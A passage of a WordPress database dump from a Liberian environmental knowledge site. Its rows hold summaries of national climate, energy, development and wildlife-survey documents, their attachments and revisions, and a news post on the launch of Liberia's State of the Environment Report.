12:46:28','Liberia’s INDC presents a context for the global effort to create a new international climate \r\nagreement by the end of the Paris Climate Summit in December 2015, in order to limit temperature increase to 2°C. Liberia recognizes the current and future threats of climate change and has been taking initiatives toward addressing these threats. Liberia ratified the United \r\nNations Framework Convention on Climate Change (UNFCCC) and the Kyoto Protocol in 2002, and has implemented a number of climate change related programs. Liberia developed its National Adaptation Programme of Action in 2008 followed by its Initial National Communication to the UNFCCC in 2012. A National Adaptation Plan (NAP) is currently being developed as a means of identifying Liberia’s medium and long-term adaptation needs. A National Climate Change Policy is also being developed to ensure that a qualitative, effective and coherent climate change adaptation process takes place, and to serve as the pillar for comprehensive sectoral strategies and action plans. Additionally, Liberia is currently implementing Reducing Emissions from Deforestation and Forest Degradation (REDD+) readiness activities.','INTENDED NATIONALLY DETERMINED CONTRIBUTIONS (INDC)','','publish','closed','closed','','intended-nationally-determined-contributions-indc','','','2021-09-23 12:46:28','2021-09-23 12:46:28','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4363',87,'document','',0),(4364,38,'2021-09-23 12:43:22','2021-09-23 12:43:22','','NDC','','inherit','open','closed','','ndc-2','','','2021-09-23 12:43:22','2021-09-23 12:43:22','',4363,'https://ekmsliberia.info/wp-content/uploads/2021/09/NDC.png',0,'attachment','image/png',0),(4365,38,'2021-09-23 12:44:00','2021-09-23 12:44:00','','Liberia INDC Final Submission Sept 30 2015.002','','inherit','open','closed','','liberia-indc-final-submission-sept-30-2015-002-2','','','2021-09-23 12:44:00','2021-09-23 12:44:00','',4363,'https://ekmsliberia.info/wp-content/uploads/2021/09/Liberia-INDC-Final-Submission-Sept-30-2015.002.pdf',0,'attachment','application/pdf',0),(4366,38,'2021-09-23 12:46:28','2021-09-23 12:46:28','Liberia’s INDC presents a context for the global effort to create a new international climate \r\nagreement by the end of the Paris Climate Summit in December 2015, in order to limit temperature increase to 2°C. Liberia recognizes the current and future threats of climate change and has been taking initiatives toward addressing these threats. Liberia ratified the United \r\nNations Framework Convention on Climate Change (UNFCCC) and the Kyoto Protocol in 2002, and has implemented a number of climate change related programs. Liberia developed its National Adaptation Programme of Action in 2008 followed by its Initial National Communication to the UNFCCC in 2012. A National Adaptation Plan (NAP) is currently being developed as a means of identifying Liberia’s medium and long-term adaptation needs. A National Climate Change Policy is also being developed to ensure that a qualitative, effective and coherent climate change adaptation process takes place, and to serve as the pillar for comprehensive sectoral strategies and action plans. Additionally, Liberia is currently implementing Reducing Emissions from Deforestation and Forest Degradation (REDD+) readiness activities.','INTENDED NATIONALLY DETERMINED CONTRIBUTIONS (INDC)','','inherit','closed','closed','','4363-revision-v1','','','2021-09-23 12:46:28','2021-09-23 12:46:28','',4363,'https://ekmsliberia.info/?p=4366',0,'revision','',0),(4368,38,'2021-09-23 13:52:13','2021-09-23 13:52:13','State of Environment Assessment and Reporting is a process of producing and communicating policy-relevant information on key interactions between the natural environment and human society.\r\nIntegrates social, economic and environmental issues in the analysis Strives to show cause-effect linkages of human and natural action on the environment and the implications on livelihoods\r\n','Introduction to the State of Environment Assessment Process','','publish','closed','closed','','introduction-to-the-state-of-environment-assessment-process','','','2021-09-23 13:52:13','2021-09-23 13:52:13','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4368',86,'document','',0),(4369,38,'2021-09-23 13:44:33','2021-09-23 13:44:33','','Introduction to the Sate of Environment','','inherit','open','closed','','introduction-to-the-sate-of-environment','','','2021-09-23 13:44:33','2021-09-23 13:44:33','',4368,'https://ekmsliberia.info/wp-content/uploads/2021/09/Introduction-to-the-Sate-of-Environment.png',0,'attachment','image/png',0),(4370,38,'2021-09-23 13:46:34','2021-09-23 13:46:34','','INTRODUCTION PPT_RSoE Training_Analytical Framework','','inherit','open','closed','','introduction-ppt_rsoe-training_analytical-framework','','','2021-09-23 13:46:34','2021-09-23 13:46:34','',4368,'https://ekmsliberia.info/wp-content/uploads/2021/09/INTRODUCTION-PPT_RSoE-Training_Analytical-Framework.pptx',0,'attachment','application/vnd.openxmlformats-officedocument.presentationml.presentation',0),(4371,38,'2021-09-23 13:52:13','2021-09-23 13:52:13','State of Environment Assessment and Reporting is a process of producing and communicating policy-relevant information on key interactions between the natural environment and human society.\r\nIntegrates social, economic and environmental issues in the analysis Strives to show cause-effect linkages of human and natural action on the environment and the implications on livelihoods\r\n','Introduction to the State of Environment Assessment Process','','inherit','closed','closed','','4368-revision-v1','','','2021-09-23 13:52:13','2021-09-23 13:52:13','',4368,'https://ekmsliberia.info/?p=4371',0,'revision','',0),(4372,38,'2021-09-23 13:53:09','2021-09-23 13:53:09','State of Environment Assessment and Reporting is a process of producing and communicating policy-relevant information on key interactions between the natural environment and human society.\r\nIntegrates social, economic and environmental issues in the analysis Strives to show cause-effect linkages of human and natural action on the environment and the implications on livelihoods\r\n','Introduction to the State of Environment Assessment Process','','inherit','closed','closed','','4368-autosave-v1','','','2021-09-23 13:53:09','2021-09-23 13:53:09','',4368,'https://ekmsliberia.info/?p=4372',0,'revision','',0),(4373,38,'2021-09-23 14:13:59','2021-09-23 14:13:59','Recognizes the need to establish backward linkages with previous reports ECOWAS SOR process must be understood as a continuous process, and not a one-off Need to reflect on policy options and recommendations that have been implemented at various levels in ECOWAS, and how they have performed\r\n','ECOWAS Environment Outlook','','publish','closed','closed','','ecowas-environment-outlook','','','2021-09-23 14:13:59','2021-09-23 14:13:59','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4373',85,'document','',0),(4374,38,'2021-09-23 14:08:44','2021-09-23 14:08:44','','ecowas Environment outlook','','inherit','open','closed','','ecowas-environment-outlook','','','2021-09-23 14:08:44','2021-09-23 14:08:44','',4373,'https://ekmsliberia.info/wp-content/uploads/2021/09/ecowas-Environment-outlook.png',0,'attachment','image/png',0),(4375,38,'2021-09-23 14:11:32','2021-09-23 14:11:32','','Land Chapter Outline 2','','inherit','open','closed','','land-chapter-outline-2','','','2021-09-23 14:11:32','2021-09-23 14:11:32','',4373,'https://ekmsliberia.info/wp-content/uploads/2021/09/Land-Chapter-Outline-2.pptx',0,'attachment','application/vnd.openxmlformats-officedocument.presentationml.presentation',0),(4376,38,'2021-09-23 14:13:59','2021-09-23 14:13:59','Recognizes the need to establish backward linkages with previous reports ECOWAS SOR process must be understood as a continuous process, and not a one-off Need to reflect on policy options and recommendations that have been implemented at various levels in ECOWAS, and how they have performed\r\n','ECOWAS Environment Outlook','','inherit','closed','closed','','4373-revision-v1','','','2021-09-23 14:13:59','2021-09-23 14:13:59','',4373,'https://ekmsliberia.info/?p=4376',0,'revision','',0),(4377,38,'2021-09-23 14:25:08','2021-09-23 14:25:08','The Pro-Poor Agenda for Prosperity and Development 2018 to 2023 (PAPD) is the second in the series of 5-year National Development \r\nPlans (NDP) anticipated under the Liberia Vision 2030 framework. It follows the Agenda for Transformation 2012-2017 (AfT). It is \r\ninformed as well by lessons learned from the implementation of the Interim Poverty Reduction Strategy 2007 (iPRS) and the Poverty \r\nReduction Strategy (2008-2011).\r\n\r\nThe fundamentals underpinning the PAPD are: i) Liberia is rich in human and natural resources; but ii) is deprived of development \r\nlargely because its human capital lacks the knowledge to transform the natural resources into wealth—whether through farming, \r\nmining, fishing, or other productive ventures that require technology or financial investments. Consequently, Liberia is relatively rich in \r\nnatural capital but relatively poor in relations to its peers in both human and produced capital. Moreover, because of a legacy of \r\nentrenched inequality in access to development opportunities, widespread infrastructure deficits and pervasive poverty have \r\nbecome the binding constraints to future growth and prosperity. ','P R O-POOR  AGEN D A FOR P ROSPERI TY AND D EVE L O PMENT ( PAP D )','','publish','closed','closed','','p-r-o-poor-agen-d-a-for-p-rosperi-ty-and-d-eve-l-o-pment-pap-d','','','2021-09-23 14:25:08','2021-09-23 14:25:08','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4377',84,'document','',0),(4378,38,'2021-09-23 14:19:21','2021-09-23 14:19:21','','CDC','','inherit','open','closed','','cdc','','','2021-09-23 14:19:21','2021-09-23 14:19:21','',4377,'https://ekmsliberia.info/wp-content/uploads/2021/09/CDC.png',0,'attachment','image/png',0),(4379,38,'2021-09-23 14:21:56','2021-09-23 14:21:56','','PAPD pro-poor agenda for prosperity and development','','inherit','open','closed','','papd-pro-poor-agenda-for-prosperity-and-development-2','','','2021-09-23 14:21:56','2021-09-23 14:21:56','',4377,'https://ekmsliberia.info/wp-content/uploads/2021/09/PAPD-pro-poor-agenda-for-prosperity-and-development.pdf',0,'attachment','application/pdf',0),(4380,38,'2021-09-23 14:25:08','2021-09-23 14:25:08','The Pro-Poor Agenda for Prosperity and Development 2018 to 2023 (PAPD) is the second in the series of 5-year National Development \r\nPlans (NDP) anticipated under the Liberia Vision 2030 framework. It follows the Agenda for Transformation 2012-2017 (AfT). It is \r\ninformed as well by lessons learned from the implementation of the Interim Poverty Reduction Strategy 2007 (iPRS) and the Poverty \r\nReduction Strategy (2008-2011).\r\n\r\nThe fundamentals underpinning the PAPD are: i) Liberia is rich in human and natural resources; but ii) is deprived of development \r\nlargely because its human capital lacks the knowledge to transform the natural resources into wealth—whether through farming, \r\nmining, fishing, or other productive ventures that require technology or financial investments. Consequently, Liberia is relatively rich in \r\nnatural capital but relatively poor in relations to its peers in both human and produced capital. Moreover, because of a legacy of \r\nentrenched inequality in access to development opportunities, widespread infrastructure deficits and pervasive poverty have \r\nbecome the binding constraints to future growth and prosperity. ','P R O-POOR  AGEN D A FOR P ROSPERI TY AND D EVE L O PMENT ( PAP D )','','inherit','closed','closed','','4377-revision-v1','','','2021-09-23 14:25:08','2021-09-23 14:25:08','',4377,'https://ekmsliberia.info/?p=4380',0,'revision','',0),(4381,38,'2021-09-23 14:25:27','2021-09-23 14:25:27','The Pro-Poor Agenda for Prosperity and Development 2018 to 2023 (PAPD) is the second in the series of 5-year National Development \r\nPlans (NDP) anticipated under the Liberia Vision 2030 framework. It follows the Agenda for Transformation 2012-2017 (AfT). It is \r\ninformed as well by lessons learned from the implementation of the Interim Poverty Reduction Strategy 2007 (iPRS) and the Poverty \r\nReduction Strategy (2008-2011).\r\n\r\nThe fundamentals underpinning the PAPD are: i) Liberia is rich in human and natural resources; but ii) is deprived of development \r\nlargely because its human capital lacks the knowledge to transform the natural resources into wealth—whether through farming, \r\nmining, fishing, or other productive ventures that require technology or financial investments. Consequently, Liberia is relatively rich in \r\nnatural capital but relatively poor in relations to its peers in both human and produced capital. Moreover, because of a legacy of \r\nentrenched inequality in access to development opportunities, widespread infrastructure deficits and pervasive poverty have \r\nbecome the binding constraints to future growth and prosperity. ','P R O-POOR  AGEN D A FOR P ROSPERI TY AND D EVE L O PMENT ( PAP D )','','inherit','closed','closed','','4377-autosave-v1','','','2021-09-23 14:25:27','2021-09-23 14:25:27','',4377,'https://ekmsliberia.info/?p=4381',0,'revision','',0),(4382,38,'2021-09-23 14:39:44','2021-09-23 14:39:44','The National Energy Policy (NEP) is the product of an extensive process of consultations that started with the National Energy Stakeholders Forum (NESF) in October 2006. Recommendations from that forum were summarized in the National Energy Sector White Paper published in February 2007. After a process of scrutiny and validation involving all key stakeholders, the White Paper has now been transformed into the \r\nNEP. \r\n','NATIONAL ENERGY POLICY AN AGENDA FOR ACTION AND ECONOMIC AND SOCIAL DEVELOPMENT','','publish','closed','closed','','national-energy-policy-an-agenda-for-action-and-economic-and-social-development','','','2021-09-23 14:39:44','2021-09-23 14:39:44','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4382',83,'document','',0),(4383,38,'2021-09-23 14:35:47','2021-09-23 14:35:47','','MME','','inherit','open','closed','','mme','','','2021-09-23 14:35:47','2021-09-23 14:35:47','',4382,'https://ekmsliberia.info/wp-content/uploads/2021/09/MME.png',0,'attachment','image/png',0),(4384,38,'2021-09-23 14:36:50','2021-09-23 14:36:50','','National Energy Policy 2009','','inherit','open','closed','','national-energy-policy-2009-2','','','2021-09-23 14:36:50','2021-09-23 14:36:50','',4382,'https://ekmsliberia.info/wp-content/uploads/2021/09/National-Energy-Policy-2009.pdf',0,'attachment','application/pdf',0),(4385,38,'2021-09-23 14:39:44','2021-09-23 14:39:44','The National Energy Policy (NEP) is the product of an extensive process of consultations that started with the National Energy Stakeholders Forum (NESF) in October 2006. Recommendations from that forum were summarized in the National Energy Sector White Paper published in February 2007. After a process of scrutiny and validation involving all key stakeholders, the White Paper has now been transformed into the \r\nNEP. \r\n','NATIONAL ENERGY POLICY AN AGENDA FOR ACTION AND ECONOMIC AND SOCIAL DEVELOPMENT','','inherit','closed','closed','','4382-revision-v1','','','2021-09-23 14:39:44','2021-09-23 14:39:44','',4382,'https://ekmsliberia.info/?p=4385',0,'revision','',0),(4386,38,'2021-09-23 14:39:57','2021-09-23 14:39:57','The National Energy Policy (NEP) is the product of an extensive process of consultations that started with the National Energy Stakeholders Forum (NESF) in October 2006. Recommendations from that forum were summarized in the National Energy Sector White Paper published in February 2007. After a process of scrutiny and validation involving all key stakeholders, the White Paper has now been transformed into the \r\nNEP. \r\n','NATIONAL ENERGY POLICY AN AGENDA FOR ACTION AND ECONOMIC AND SOCIAL DEVELOPMENT','','inherit','closed','closed','','4382-autosave-v1','','','2021-09-23 14:39:57','2021-09-23 14:39:57','',4382,'https://ekmsliberia.info/?p=4386',0,'revision','',0),(4387,38,'2021-09-23 14:52:38','2021-09-23 14:52:38','On assignment by Golden Veroleum (Liberia), Inc. (GVL) from the 5th of December 2013 to the 7th of January 2014, the Wild Chimpanzee Foundation (WCF) led a chimpanzee and large mammal survey in the Kpayan district Gross Concession area (for reference on terminology \r\nrelated to area refer to Appendix 1). Using IUCN standards for transect surveys of great apes; a sampling design was created to cover the whole of the EPA permit area. Data was collected along 54 linear transects of 1 km for chimpanzees, large mammals and anthropogenic pressure. From the data collected, we could estimate a total population of 48 chimpanzees in the 15,000 hectares area of field investigation, of which an estimated 14 chimpanzees can be found in the 8,000 hectare RSPO permit area. This compares to an estimated population of 7,008 chimpanzees in Liberia in a total area of 10,697,049 hectares (Tweh et al., in press) and 1,517 in the three protected areas of Liberia in a total area of 534,194 hectares (Tweh et al., in press). Estimations for the nursery area and other proposed first stage development areas are not possible due to the low number of data.','Report on the Chimpanzee and Large  Mammal survey in the Kpayan Gross  Concession Area of investigation of  Golden Veroleum, Liberia','','publish','closed','closed','','report-on-the-chimpanzee-and-large-mammal-survey-in-the-kpayan-gross-concession-area-of-investigation-of-golden-veroleum-liberia','','','2021-09-23 14:52:38','2021-09-23 14:52:38','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4387',82,'document','',0),(4388,38,'2021-09-23 14:47:26','2021-09-23 14:47:26','','WJF','','inherit','open','closed','','wjf','','','2021-09-23 14:47:26','2021-09-23 14:47:26','',4387,'https://ekmsliberia.info/wp-content/uploads/2021/09/WJF.png',0,'attachment','image/png',0),(4389,38,'2021-09-23 14:49:25','2021-09-23 14:49:25','','2014_gvl_report_','','inherit','open','closed','','2014_gvl_report_-2','','','2021-09-23 14:49:25','2021-09-23 14:49:25','',4387,'https://ekmsliberia.info/wp-content/uploads/2021/09/2014_gvl_report_.pdf',0,'attachment','application/pdf',0),(4390,38,'2021-09-23 14:52:38','2021-09-23 14:52:38','On assignment by Golden Veroleum (Liberia), Inc. (GVL) from the 5th of December 2013 to the 7th of January 2014, the Wild Chimpanzee Foundation (WCF) led a chimpanzee and large mammal survey in the Kpayan district Gross Concession area (for reference on terminology \r\nrelated to area refer to Appendix 1). Using IUCN standards for transect surveys of great apes; a sampling design was created to cover the whole of the EPA permit area. Data was collected along 54 linear transects of 1 km for chimpanzees, large mammals and anthropogenic pressure. From the data collected, we could estimate a total population of 48 chimpanzees in the 15,000 hectares area of field investigation, of which an estimated 14 chimpanzees can be found in the 8,000 hectare RSPO permit area. This compares to an estimated population of 7,008 chimpanzees in Liberia in a total area of 10,697,049 hectares (Tweh et al., in press) and 1,517 in the three protected areas of Liberia in a total area of 534,194 hectares (Tweh et al., in press). Estimations for the nursery area and other proposed first stage development areas are not possible due to the low number of data.','Report on the Chimpanzee and Large  Mammal survey in the Kpayan Gross  Concession Area of investigation of  Golden Veroleum, Liberia','','inherit','closed','closed','','4387-revision-v1','','','2021-09-23 14:52:38','2021-09-23 14:52:38','',4387,'https://ekmsliberia.info/?p=4390',0,'revision','',0),(4391,38,'2021-09-23 15:10:28','2021-09-23 15:10:28','Liberia institutional crisis reflected the small cohesion of a country where urban growth in the coastal area is achieved by human and natural resources depletion in the interior. Economic depression and decomposition of governance opened the way to an increased and fuzzy \r\nexploitation of natural resources and degradation of human settlements environment. With the progress of the peace process, the main goals of institutions and the Liberian society as a whole have become the enhancement of national cohesion through governance and the improvement of livelihood through economic expansion. In short, Liberia economic and social converge on the reduction of poverty.\r\n\r\nThe social instability created by the war has continued, for several reasons, such as low productivity, unemployment and the uprooting of settled patterns of life, especially in the rural areas. Migrations from rural areas to Monrovia and other urban areas reflect the difficulty of peasants to keep in balance with their environment. In fact, the environment should be accounted as one of the main losers of the Liberian crisis. As illegal exploitation of natural resources was one of the economic resources of the fighting parties in the civil was, such trend is still going on, also if in a smaller scale, due to the weakness of the institutions. The mismanagement of the environment is accomplished both by individuals (ex combatants, poor, migrants) and enterprises (Liberian and transnational companies), looking for short term and easy gains and unwilling or unable to invest in sustainable technology. ','Liberia environmental profile','','publish','closed','closed','','liberia-environmental-profile','','','2021-09-23 15:10:28','2021-09-23 15:10:28','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4391',81,'document','',0),(4392,38,'2021-09-23 15:07:20','2021-09-23 15:07:20','','Liberia Environmental Profile','','inherit','open','closed','','liberia-environmental-profile','','','2021-09-23 15:07:20','2021-09-23 15:07:20','',4391,'https://ekmsliberia.info/wp-content/uploads/2021/09/Liberia-Environmental-Profile.png',0,'attachment','image/png',0),(4393,38,'2021-09-23 15:08:12','2021-09-23 15:08:12','','cep_liberia_2006_','','inherit','open','closed','','cep_liberia_2006_','','','2021-09-23 15:08:12','2021-09-23 15:08:12','',4391,'https://ekmsliberia.info/wp-content/uploads/2021/09/cep_liberia_2006_.pdf',0,'attachment','application/pdf',0),(4394,38,'2021-09-23 15:10:28','2021-09-23 15:10:28','Liberia institutional crisis reflected the small cohesion of a country where urban growth in the coastal area is achieved by human and natural resources depletion in the interior. Economic depression and decomposition of governance opened the way to an increased and fuzzy \r\nexploitation of natural resources and degradation of human settlements environment. With the progress of the peace process, the main goals of institutions and the Liberian society as a whole have become the enhancement of national cohesion through governance and the improvement of livelihood through economic expansion. In short, Liberia economic and social converge on the reduction of poverty.\r\n\r\nThe social instability created by the war has continued, for several reasons, such as low productivity, unemployment and the uprooting of settled patterns of life, especially in the rural areas. Migrations from rural areas to Monrovia and other urban areas reflect the difficulty of peasants to keep in balance with their environment. In fact, the environment should be accounted as one of the main losers of the Liberian crisis. As illegal exploitation of natural resources was one of the economic resources of the fighting parties in the civil was, such trend is still going on, also if in a smaller scale, due to the weakness of the institutions. The mismanagement of the environment is accomplished both by individuals (ex combatants, poor, migrants) and enterprises (Liberian and transnational companies), looking for short term and easy gains and unwilling or unable to invest in sustainable technology. ','Liberia environmental profile','','inherit','closed','closed','','4391-revision-v1','','','2021-09-23 15:10:28','2021-09-23 15:10:28','',4391,'https://ekmsliberia.info/?p=4394',0,'revision','',0),(4395,38,'2021-09-23 15:50:51','0000-00-00 00:00:00','','EPA-STRATEGY PLAN IMMPLEMEMATATION','','draft','closed','closed','','','','','2021-09-23 15:50:51','2021-09-23 15:50:51','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4395',80,'document','',0),(4396,38,'2021-09-23 16:10:18','2021-09-23 16:10:18','The idea of developing a Strategic Plan for the Environmental Protection Agency (EPA), Liberia, was initiated by management during a retreat in December 2010, held in Monrovia, to enhance its programs through the effective and efficient protection and management of Liberia’s Environment.\r\n\r\nThe purpose of the Strategic Plan is to strategize all of EPA’s activities, and identify areas of key interventions for improved quality results. The Strategic Plan has been designed to cover a period of five (5) years, 2011-2015. After each yearly review, the programs shall be rolled over for performance evaluation and a fresher look at future prospects. During the implementation period, corporate re-organization and restructuring shall be undertaken by management, and EPA Personnel shall be given adequate training both internally and externally, necessary for effective result oriented performance.\r\n','EPA STRATEGIC IMPLEMENTATION PLAN','','publish','closed','closed','','epa-strategic-implementation-plan','','','2021-09-23 16:10:18','2021-09-23 16:10:18','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4396',79,'document','',0),(4397,38,'2021-09-23 16:05:49','2021-09-23 16:05:49','','EPA','','inherit','open','closed','','epa-5','','','2021-09-23 16:05:49','2021-09-23 16:05:49','',4396,'https://ekmsliberia.info/wp-content/uploads/2021/09/EPA-1.png',0,'attachment','image/png',0),(4398,38,'2021-09-23 16:06:37','2021-09-23 16:06:37','','EPA-STRATEGY PLAN IMMPLEMMATION FINAL WORKs','','inherit','open','closed','','epa-strategy-plan-immplemmation-final-works','','','2021-09-23 16:06:37','2021-09-23 16:06:37','',4396,'https://ekmsliberia.info/wp-content/uploads/2021/09/EPA-STRATEGY-PLAN-IMMPLEMMATION-FINAL-WORKs.pdf',0,'attachment','application/pdf',0),(4399,38,'2021-09-23 16:10:18','2021-09-23 16:10:18','The idea of developing a Strategic Plan for the Environmental Protection Agency (EPA), Liberia, was initiated by management during a retreat in December 2010, held in Monrovia, to enhance its programs through the effective and efficient protection and management of Liberia’s Environment.\r\n\r\nThe purpose of the Strategic Plan is to strategize all of EPA’s activities, and identify areas of key interventions for improved quality results. The Strategic Plan has been designed to cover a period of five (5) years, 2011-2015. After each yearly review, the programs shall be rolled over for performance evaluation and a fresher look at future prospects. During the implementation period, corporate re-organization and restructuring shall be undertaken by management, and EPA Personnel shall be given adequate training both internally and externally, necessary for effective result oriented performance.\r\n','EPA STRATEGIC IMPLEMENTATION PLAN','','inherit','closed','closed','','4396-revision-v1','','','2021-09-23 16:10:18','2021-09-23 16:10:18','',4396,'https://ekmsliberia.info/?p=4399',0,'revision','',0),(4400,38,'2021-09-28 16:21:13','2021-09-28 16:21:13','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Environmental Protection Agency of Liberia (EPA) has again achieved another milestone by launching the Second State of the Environment Report (SoER) and First National Environmental Action Plan (NEAP) in the country history.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Launching the two instruments, the Executive Director and Chief Executive Officer (CEO) of EPA, Prof. Wilson K. Tarpeh, said the last time EPA reported on the State of the Environment was almost 15 years ago during the end of the civil conflict.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the Report identified enormous environmental challenges as it relates to deforestation, waste management, unregulated bush meat hunting, pollution of water bodies, illicit artisanal mining, unregulated of fishing activities in our marine ecosystem, destruction of wetlands, issue of climate change and others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“…I am pleased to inform you that after fifteen years when the First State of the Environment Report was released, the EPA had and continues to make tremendous progress in addressing environmental and climate change problems in the country. Remarkable achievements that have been made include the steady awareness of environment and climate change issues in the country, mainstreaming of climate change in the national development agenda, consideration of environmental and climate change risk in major developmental activities through the Environmental Social and Impact Assessment (ESIA) Platform, domestication of the multilateral environmental agreements, formulation of major environmental strategies which include the National Climate Change Policy and Response Strategy, the completion of the revised Nationally</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Determined Contributions(NDCs), the formulation of the First and Second National Biodiversity and Strategy Action Plans, the eradication of the ozone depleting substances, the protection and management of wetlands of international importance, support for the establishment of the graduate programme in Environmental Science, Climate Change and Biodiversity at the nation’s premier university, the University of Liberia and many more. All these efforts made are intended to ensure that the EPA protect and manage the environment for the promotion of a resilient sustained environment,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA boss said he was excited to launch the Second State of the Environment Report and First National Environmental Action Plan which have been long coming, saying “the first SoER was developed and launched in 2006 with support from the United Nations Development Program (UNDP) and today we have gathered to launch the 2nd SoER in accordance with the Environmental Protection and Management Law of Liberia (EPML). The EPML provides that a SoER should be produced every Five (5) years.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He recalled that in 2016, EPA negotiated with the Liberia Forest Sector Project (LFSP) and pushed for this to be done and the World Bank (WB) accepted the proposal “for which we are grateful. The process has been tedious and we are grateful that a Liberian Firm, GREENCONS, competed with other international firms to develop the SOER and NEAP and, we are glad they have completed the work. “</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh: “The SoER for 2007-2018 and its NEAP for 2019-2023 have been developed and completed. The report reveals the current condition of the environment in Liberia. It presents an overview of the country, the state of the environment and trends under various themes: agriculture, water, forestry and biodiversity, atmospheric, geology and soils, terrestrial and aquatic ecology, climate change etc., as well as the important linkages between environment and poverty, health and the potential value of ecosystems services. Based on information contained in the report, it is clear that Liberia is endowed with rich forest reserve and biodiversity hotspots; however, the country faces environmental and social challenges. It is therefore incumbent upon us to improve the state of our environment and promote prosperity for current and future generations. We anticipate that findings in the NEAP will be mainstreamed into national and sectoral planning and contribute to decision making for the betterment of Liberia.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He acknowledged REDD+ Implementation Unit (RIU) and FDA for their collaboration and supports, the Consulting firm, GREENCONS, the EPA Focal Point, Mr. Z. Elijah Whapoe who supervised the development of the SoER and NEAP, saying “we remained forever grateful to our ESIA technical committee, the folks at the department of Planning and Policy for helping to make this happened.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also extended profound thanks and appreciation to the Government of Norway for the financial contribution that enabled EPA to produce the Second State of Environment Report and the First National Environmental Action Plan. “Additionally, the World Bank Country Office here in Monrovia for the cooperation and guidance to enable us access the financial resources through the Liberia Forest Sector Programme. Kindly allow me to also thank the various line ministries, agencies and commissions that assisted in producing the Report and Action Plan,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, Deputy Finance Minister for Budget and Development Planning, Tanneh G. Brunson, said the report could not have been launched at a more critical time than now when the government is exploring opportunities to foster economic growth and development to improve the livelihood of citizens and also in the face of growing environmental challenges in countries around the world including Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said the report covers wide range of issues from terrestrial resources to aquatic and atmospheric resources as well as cross-section resources and environmental linkages, adding that all of these concern the green and blue economy of the SDGs goal 15 (life on land) and SDGs goal 14 (life under water.)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I cannot overemphasized the significance of issues expressed in &nbsp;this report to our existence in terms of our livelihood, cultural and social stability, our health, economic growth and development and our future prosperity,” she said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said the report provides series of recommendations to various issues across all sectors that policymakers and technicians need to use as guide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Deputy Minister Brunson reaffirms government’s commitment to the allocation of funding through the national budget “as we look to our donor partners for support to the EPA and all other institutions concerned with addressing the critical issues highlighted in this report.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The specific objectives of the launch of the SoER and NEAP are: to present the SoE Report and NEAP to the Government of Liberia, its partners and the general public; increase public awareness and education on the environment of Liberia for informed policy decision-making; give insight on the linkages between environment and sustainable development; solicit buy-in from policymakers in strengthening environmental governance in the country; and rally donor supports to address environmental issues outlined in the NEAP and the subsequent preparation of SoER.</p>\n<!-- /wp:paragraph -->','Gov’t Launches State of Environment Report','','publish','open','open','','govt-launches-state-of-environment-report','','','2021-09-28 16:21:14','2021-09-28 16:21:14','',0,'https://ekmsliberia.info/?p=4400',150,'post','',0),(4401,38,'2021-09-28 16:19:49','2021-09-28 16:19:49','','State of Environment1','','inherit','open','closed','','state-of-environment1','','','2021-09-28 16:19:49','2021-09-28 16:19:49','',4400,'https://ekmsliberia.info/wp-content/uploads/2021/09/State-of-Environment1.jpg',0,'attachment','image/jpeg',0),(4402,38,'2021-09-28 16:21:13','2021-09-28 16:21:13','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Environmental Protection Agency of Liberia (EPA) has again achieved another milestone by launching the Second State of the Environment Report (SoER) and First National Environmental Action Plan (NEAP) in the country history.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Launching the two instruments, the Executive Director and Chief Executive Officer (CEO) of EPA, Prof. Wilson K. Tarpeh, said the last time EPA reported on the State of the Environment was almost 15 years ago during the end of the civil conflict.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the Report identified enormous environmental challenges as it relates to deforestation, waste management, unregulated bush meat hunting, pollution of water bodies, illicit artisanal mining, unregulated of fishing activities in our marine ecosystem, destruction of wetlands, issue of climate change and others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“…I am pleased to inform you that after fifteen years when the First State of the Environment Report was released, the EPA had and continues to make tremendous progress in addressing environmental and climate change problems in the country. Remarkable achievements that have been made include the steady awareness of environment and climate change issues in the country, mainstreaming of climate change in the national development agenda, consideration of environmental and climate change risk in major developmental activities through the Environmental Social and Impact Assessment (ESIA) Platform, domestication of the multilateral environmental agreements, formulation of major environmental strategies which include the National Climate Change Policy and Response Strategy, the completion of the revised Nationally</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Determined Contributions(NDCs), the formulation of the First and Second National Biodiversity and Strategy Action Plans, the eradication of the ozone depleting substances, the protection and management of wetlands of international importance, support for the establishment of the graduate programme in Environmental Science, Climate Change and Biodiversity at the nation’s premier university, the University of Liberia and many more. All these efforts made are intended to ensure that the EPA protect and manage the environment for the promotion of a resilient sustained environment,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA boss said he was excited to launch the 